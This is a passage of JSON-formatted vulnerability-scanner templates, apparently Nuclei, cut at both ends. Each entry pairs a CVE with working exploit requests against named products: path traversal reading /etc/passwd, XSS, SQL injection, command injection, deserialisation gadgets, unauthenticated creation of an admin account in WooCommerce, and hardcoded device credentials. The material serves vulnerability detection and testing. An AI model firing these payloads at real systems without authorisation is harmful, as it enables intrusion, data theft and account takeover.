Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4679","info":{"name":"Joomla! Portfolio Nexus - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4202","info":{"name":"Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-2015","info":{"name":"Joomla! MooFAQ 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-5020","info":{"name":"AWStats < 6.95 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=interact.sh","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2009-1496","info":{"name":"Joomla! Cmimarketplace 0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1872","info":{"name":"Adobe Coldfusion <=8.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0932","info":{"name":"Horde/Horde Groupware - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0347","info":{"name":"Autonomy Ultraseek - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs.html?url=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2009-3053","info":{"name":"Joomla! Agora 3.0.0b  - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27008","info":{"name":"ATutor < 2.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /atutor/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntoken=asdf\");}alert(document.domain);+function+asdf()+{//\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[");}alert(document.domain); function","ATutor","Login"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20887","info":{"name":"VMware VRealize Network Insight - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /saas./resttosaasservlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-thrift\n\n[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`{{cmd}}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"rec\":"]},{"type":"word","part":"header","words":["application/x-thrift"]},{"type":"word","part":"body","negative":true,"words":["Provided invalid node Id","Invalid nodeId"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26842","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /OptionManager.php?mode=classes&ListID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n1name=Member&2name=Regular+Attender&3name=Guest&4name=Non-Attender&5name=Non-Attender+%28staff%29&newFieldName=\" onfocus=alert(document.domain) autofocus=\"&AddField=Add+New+Person+Classification\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=alert(document.domain) autofocus=\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2023-34843","info":{"name":"Traggo Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0562","info":{"name":"Bank Locker Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /banker/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+AND+4719%3D4719--+GZHh&inputpwd=ABC&login=\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"admin\")","contains(body, \"BLMS | Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-25346","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","GET /v2/person/not-found?id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-38646","info":{"name":"Metabase < 0.46.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/session/properties HTTP/1.1\nHost: {{Hostname}}\n","POST /api/setup/validate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n   \"token\":\"{{token}}\",\n   \"details\":{\n      \"details\":{\n         \"subprotocol\":\"h2\",\n         \"classname\":\"org.h2.Driver\",\n         \"advanced-options\":true,\n         \"subname\":\"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '{{file}}'//\\\\;\"\n      },\n      \"name\":\"{{randstr}}\",\n      \"engine\":\"postgres\"\n   }\n}\n"],"extractors":[{"type":"json","part":"body_1","name":"token","json":[".[\"setup-token\"]"],"internal":true}],"matchers":[{"type":"dsl","dsl":["contains_any(body_2, \"Syntax error in SQL statement\",\"NoSuchFileException\")","status_code_2 == 400"],"condition":"and"}]}]},{"id":"CVE-2023-30212","info":{"name":"OURPHP <= 7.2.0 -  Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location.href='../..</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0669","info":{"name":"Fortra GoAnywhere MFT - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /goanywhere/lic/accept HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\n\nbundle={{concat(url_encode(base64(aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo=\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\")))), '$2')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["GoAnywhere"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-36844","info":{"name":"Juniper Devices - Remote Code Execution","severity":"medium"},"requests":[{"raw":["POST /webauth_operation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrs=do_upload&rsargs[]=[{\"fileData\": \"data:text/html;base64,{{base64(payload)}}\", \"fileName\": \"{{rand_base(5, \"abc\")}}.php\", \"csize\": {{len(payload)}}}]\n","POST /webauth_operation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrs=do_upload&rsargs[]=[{\"fileName\": \"{{rand_base(5, \"abc\")}}.ini\", \"fileData\": \"data:text/html;base64,{{base64(concat('auto_prepend_file=',hex_decode('22'),'/var/tmp/',phpfile,hex_decode('22')))}}\", \"csize\": \"97\" }]\n","GET /webauth_operation.php?PHPRC=/var/tmp/{{inifile}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"original_fileName\":","\"converted_fileName\":"],"condition":"and"},{"type":"word","part":"body_3","words":["{{md5(value)}}"]}],"extractors":[{"type":"regex","part":"body_1","name":"phpfile","regex":["([a-f0-9]{64}\\.php)"],"internal":true},{"type":"regex","part":"body_2","name":"inifile","regex":["([a-f0-9]{64}\\.ini)"],"internal":true}]}]},{"id":"CVE-2023-0126","info":{"name":"SonicWall SMA1000 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["content/unknown"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22478","info":{"name":"KubePi <= v1.6.4 LoginLogsSearch - Unauthorized Access","severity":"high"},"requests":[{"raw":["@timeout 10\nPOST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"apiVersion\":","\"uuid\":","\"userName\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28432","info":{"name":"MinIO Cluster Deployment - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /minio/bootstrap/v1/verify HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"MINIO_ROOT_PASSWORD\":","\"MINIO_ROOT_USER\":","\"MinioEnv\":"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28665","info":{"name":"Woo Bulk Price Update <2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=techno_get_products&page=<svg%20onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<svg onload=alert(document.domain)>\")","contains(body_2, \"pagination\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2023-32235","info":{"name":"Ghost CMS < 5.42.1 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/built%2F..%2F..%2F/package.json","{{BaseURL}}/assets/built%2F..%2F..%2F%E0%A4%A/package.json"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\"","\"version\"","\"ghost\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1177","info":{"name":"Mlflow <2.2.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file:///etc/\"}\n","GET /model-versions/get-artifact?path=passwd&name=AJAX-API&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-39141","info":{"name":"Aria2 WebUI - Path traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/../../../../etc/passwd"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"Aria2 WebUI\")","regex(\"root:x:0:0:\",body_2)"],"condition":"and"}]}]},{"id":"CVE-2023-29084","info":{"name":"ManageEngine ADManager Plus - Command Injection","severity":"high"},"requests":[{"raw":["POST /j_security_check HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nis_admp_pass_encrypted=false&j_username={{username}}&j_password={{password}}&domainName=ADManager+Plus+Authentication&AUTHRULE_NAME=ADAuthenticator\n","GET /home.do HTTP/1.1\nHost: {{Hostname}}\n","POST /api/json/admin/saveServerSettings HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nparams=[{\"tabId\":\"proxy\",\"ENABLE_PROXY\":true,\"SERVER_NAME\":\"1.1.1.1\",\"USER_NAME\":\"random\",\"PASSWORD\":\"asd\\r\\n{{cmd}}\",\"PORT\":\"80\"}]&admpcsrf={{admpcsrf}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"message\":\"","Proxy Settings"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"kval","name":"admpcsrf","internal":true,"kval":["admpcsrf"],"part":"header"}]}]},{"id":"CVE-2023-1546","info":{"name":"MyCryptoCheckout < 2.124 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&\"><script>alert(/XSS/)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"scriptalert(/XSS/)/script\")","contains(body_2, \"mycryptocheckout\")"],"condition":"and"}]}]},{"id":"CVE-2023-27159","info":{"name":"Appwrite <=1.2.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/avatars/favicon?url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Appwrite-Server"]}]}]},{"id":"CVE-2023-34598","info":{"name":"Gibbon v25.0.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=./gibbon.sql"],"matchers-condition":"and","matchers":[{"type":"word","words":["phpMyAdmin SQL Dump","gibbon"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28121","info":{"name":"WooCommerce Payments - Unauthorized Admin Access","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nX-WCPAY-PLATFORM-CHECKOUT-USER: 1\nContent-Type: application/x-www-form-urlencoded\n\nrest_route=%2Fwp%2Fv2%2Fusers&username={{username}}&email={{email}}&password={{password}}&roles=administrator\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered_date\":","\"username\":","\"email\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[201]}],"extractors":[{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-23752","info":{"name":"Joomla! Webservice - Password Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/index.php/v1/config/application?public=true","{{BaseURL}}/api/v1/config/application?public=true"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"links\":","\"attributes\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json","application/vnd.api+json"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35843","info":{"name":"NocoDB version <= 0.106.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/{{repeat('..%2F', 5)}}etc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30256","info":{"name":"Webkul QloApps 1.5.2 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["xss onfocus=alert(document.domain) autofocus= xss","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0448","info":{"name":"WP Helper Lite < 4.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"><svg onload=alert(document.domain)>\")","contains(body, \"params\\\":{\\\"action\")"],"condition":"and"}]}]},{"id":"CVE-2023-26469","info":{"name":"Jorani 1.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /session/login HTTP/1.1\nHost: {{Hostname}}\n","POST /session/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword\n","GET /pages/view/log-{{date_time(\"%Y-%M-%D\")}} HTTP/1.1\nHost: {{Hostname}}\nX-REQUESTED-WITH: XMLHttpRequest\n{{header}}: {{base64(\"echo ---------;{{cmd}} 2>&1;echo ---------;\")}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["uid=(\\d+)\\(.*?\\) gid=(\\d+)\\(.*?\\) groups=([\\d,]+)\\(.*?\\)"]},{"type":"status","part":"header_3","status":[401]}],"extractors":[{"type":"regex","part":"body","group":1,"internal":true,"name":"csrf","regex":["name=\"csrf_test_jorani\" value=\"(.*?)\""]}]}]},{"id":"CVE-2023-22620","info":{"name":"SecurePoint UTM 12.x Session ID Leak","severity":"high"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"auth\",\"command\":[\"login\"],\"sessionid\":\"\",\"arguments\":{\"user\":\"\",\"pass\":\"\"}}\n","POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"system\",\"command\":[\"config\",\"get\"],\"sessionid\":\"{{session}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"status\":\"OK\""]},{"type":"word","part":"header_2","words":["application/json"]}],"extractors":[{"type":"regex","name":"session","group":1,"regex":["\"sessionid\": \"([a-z0-9]+)\""],"internal":true}]}]},{"id":"CVE-2023-31548","info":{"name":"ChurchCRM v4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /FundRaiserEditor.php?linkBack=&FundRaiserID=-1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nFundRaiserSubmit=Save&Date=2023-06-24&Title=%22+onfocus%3D%22alert%28document.domain%29%22+autofocus%3D%22&Description=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=\\\"alert(document.domain)\\\" autofocus=\\\"\\\"></td>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-39600","info":{"name":"IceWarp 11.4.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=\"><img src=x onerror=confirm(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img src=x onerror=confirm(document.domain)>","IceWarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25135","info":{"name":"vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/api/user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a\"googlelogin_vendor_autoload\"%3a0%3a{}i%3a1%3bO%3a32%3a\"Monolog\\Handler\\SyslogUdpHandler\"%3a1%3a{s%3a9%3a\"%00*%00socket\"%3bO%3a29%3a\"Monolog\\Handler\\BufferHandler\"%3a7%3a{s%3a10%3a\"%00*%00handler\"%3br%3a4%3bs%3a13%3a\"%00*%00bufferSize\"%3bi%3a-1%3bs%3a9%3a\"%00*%00buffer\"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a\"CVE-2023-25135\"%3bs%3a5%3a\"level\"%3bN%3b}}s%3a8%3a\"%00*%00level\"%3bN%3bs%3a14%3a\"%00*%00initialized\"%3bb%3a1%3bs%3a14%3a\"%00*%00bufferLimit\"%3bi%3a-1%3bs%3a13%3a\"%00*%00processors\"%3ba%3a2%3a{i%3a0%3bs%3a7%3a\"current\"%3bi%3a1%3bs%3a8%3a\"var_dump\"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["string(14)","\"CVE-2023-25135\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1698","info":{"name":"WAGO - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"package\":\";id;#\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"license\":","\"name\":","uid=","gid="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23161","info":{"name":"Art Gallery Management System Project v1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["center\"><img src=1 onerror=alert(document.domain)>","Art Type"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38433","info":{"name":"Fujitsu IP Series - Hardcoded Credentials","severity":"high"},"requests":[{"raw":["GET /b_download/index.html HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(username + ':' + password)}}\n"],"attack":"pitchfork","payloads":{"username":["fedish264pro","fedish265pro"],"password":["h264pro@broadsight","h265pro@broadsight"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Field Support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37462","info":{"name":"XWiki Platform - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view","{{BaseURL}}/asyncrenderer/{{url}}?clientId={{id}}&timeout=500&wiki=xwiki"],"cookie-reuse":true,"skip-variables-check":true,"extractors":[{"type":"regex","group":1,"name":"id","regex":["data-xwiki-async-client-id=\"(.+?)\""],"internal":true},{"type":"regex","group":1,"name":"url","regex":["<span class=\"xwiki-async\" data-xwiki-async-id=\"(.+?)\""],"internal":true}],"matchers":[{"type":"dsl","dsl":["body_2 == \"31557644536232\"","contains(header_2, \"text/html\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-3345","info":{"name":"LMS by Masteriyo < 1.6.8 - Information Exposure","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/masteriyo/v1/users/ HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: {{nonce}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"username\":","\"email\":","\"roles\":"],"condition":"and"},{"type":"word","part":"header_3","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\",\"versionString"],"internal":true}]}]},{"id":"CVE-2023-24733","info":{"name":"PMB 7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>@"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4634","info":{"name":"Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/media-library-assistant/readme.txt","{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Media Library Assistant"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-37265","info":{"name":"CasaOS  < 0.4.4 - Authentication 